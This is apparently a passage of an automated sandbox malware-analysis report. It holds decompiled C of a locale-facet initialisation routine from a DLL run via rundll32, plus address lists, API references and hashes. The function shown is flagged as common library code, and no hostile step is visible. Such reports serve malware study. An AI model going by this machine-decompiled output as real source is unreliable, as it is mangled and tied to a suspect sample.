										 *(_t242 - 4) = 1;
										E6E206FD3(__eflags, _t226);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e2c6dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E206FD3(__eflags, _t225);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e2c6de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}





















                          0x6e20f9f1
                          0x6e20f9f1
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa22
                          0x6e20fa27
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F9F8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FA02
                          • int.LIBCPMT ref: 6E20FA19
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • numpunct.LIBCPMT ref: 6E20FA3C
                          • std::_Facet_Register.LIBCPMT ref: 6E20FA53
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FA73
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FA91
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                          • String ID:
                          • API String ID: 2509942033-0
                          • Opcode ID: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
                          • Instruction ID: 25cf433e70bb9b3bbb59fe7f14114457af90a7abe063d505dcdecc3cddb429a5
                          • Opcode Fuzzy Hash: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
                          • Instruction Fuzzy Hash: 6911E37990052E8BCF00DBE4CC94AEEB77BAF44B14F244908E4116B2D0DFB49A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F60D, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t506 - 0x14, 0);
				_t483 =  *0x6e2c6df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6E1E161C(0x6e2c6da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6E2066BA(_t506 - 0x14);
					return E6E220075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6E2111AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t506 - 0x20);
							E6E223D74(_t506 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t471, _t483, 0x14);
							E6E206653(_t506 - 0x14, 0);
							_t484 =  *0x6e2c6dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6E1E161C(0x6e2c6d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6E2066BA(_t506 - 0x14);
								return E6E220075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6E211230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t506 - 0x20);
										E6E223D74(_t506 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t358, _t472, _t484, 0x14);
										E6E206653(_t506 - 0x14, 0);
										_t485 =  *0x6e2c6dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6E1E161C(0x6e2c6d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6E2066BA(_t506 - 0x14);
											return E6E220075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6E2112B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t506 - 0x20);
													E6E223D74(_t506 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t358, _t473, _t485, 0x14);
													E6E206653(_t506 - 0x14, 0);
													_t486 =  *0x6e2c6dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6E1E161C(0x6e2c6d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6E2066BA(_t506 - 0x14);
														return E6E220075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6E211339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t506 - 0x20);
																E6E223D74(_t506 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t358, _t474, _t486, 0x14);
																E6E206653(_t506 - 0x14, 0);
																_t487 =  *0x6e2c6db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6E1E161C(0x6e2c6d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6E2066BA(_t506 - 0x14);
																	return E6E220075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6E2113A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t506 - 0x20);
																			E6E223D74(_t506 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t358, _t475, _t487, 0x14);
																			E6E206653(_t506 - 0x14, 0);
																			_t488 =  *0x6e2c6ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6E1E161C(0x6e2c6d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6E2066BA(_t506 - 0x14);
																				return E6E220075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6E211409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t506 - 0x20);
																						E6E223D74(_t506 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t358, _t476, _t488, 0x14);
																						E6E206653(_t506 - 0x14, 0);
																						_t489 =  *0x6e2c6de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6E1E161C(0x6e2c6d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6E2066BA(_t506 - 0x14);
																							return E6E220075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6E211471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t506 - 0x20);
																									E6E223D74(_t506 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t358, _t477, _t489, 0x14);
																									E6E206653(_t506 - 0x14, 0);
																									_t490 =  *0x6e2c6dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6E1E161C(0x6e2c6da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6E2066BA(_t506 - 0x14);
																										return E6E220075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6E2114EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t506 - 0x20);
																												E6E223D74(_t506 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t358, _t478, _t490, 0x14);
																												E6E206653(_t506 - 0x14, 0);
																												_t491 =  *0x6e2c6dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6E1E161C(0x6e2c6d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6E2066BA(_t506 - 0x14);
																													return E6E220075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6E211558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t506 - 0x20);
																															E6E223D74(_t506 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t358, _t479, _t491, 0x14);
																															E6E206653(_t506 - 0x14, 0);
																															_t492 =  *0x6e2c6e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6E1E161C(0x6e2c6dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6E2066BA(_t506 - 0x14);
																																return E6E220075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6E2115C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t506 - 0x20);
																																		E6E223D74(_t506 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t358, _t480, _t492, 0x14);
																																		E6E206653(_t506 - 0x14, 0);
																																		_t493 =  *0x6e2c6dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6E1E161C(0x6e2c6d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6E2066BA(_t506 - 0x14);
																																			return E6E220075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6E21162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6E1E1438(_t435);
																																					E6E223D74(_t506 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e26851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6e26c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6E21542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6E220075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6E206FD3(__eflags, _t481);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6e2c6dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6E206FD3(__eflags, _t480);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6e2c6e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6E206FD3(__eflags, _t479);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6e2c6dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6E206FD3(__eflags, _t478);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6e2c6dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6E206FD3(__eflags, _t477);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6e2c6de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6E206FD3(__eflags, _t476);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6e2c6ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6E206FD3(__eflags, _t475);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6e2c6db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6E206FD3(__eflags, _t474);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6e2c6dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6E206FD3(__eflags, _t473);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6e2c6dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6E206FD3(__eflags, _t472);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6e2c6dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6E206FD3(__eflags, _t471);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6e2c6df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}







































                          0x6e20f60d
                          0x6e20f60d
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f63e
                          0x6e20f643
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
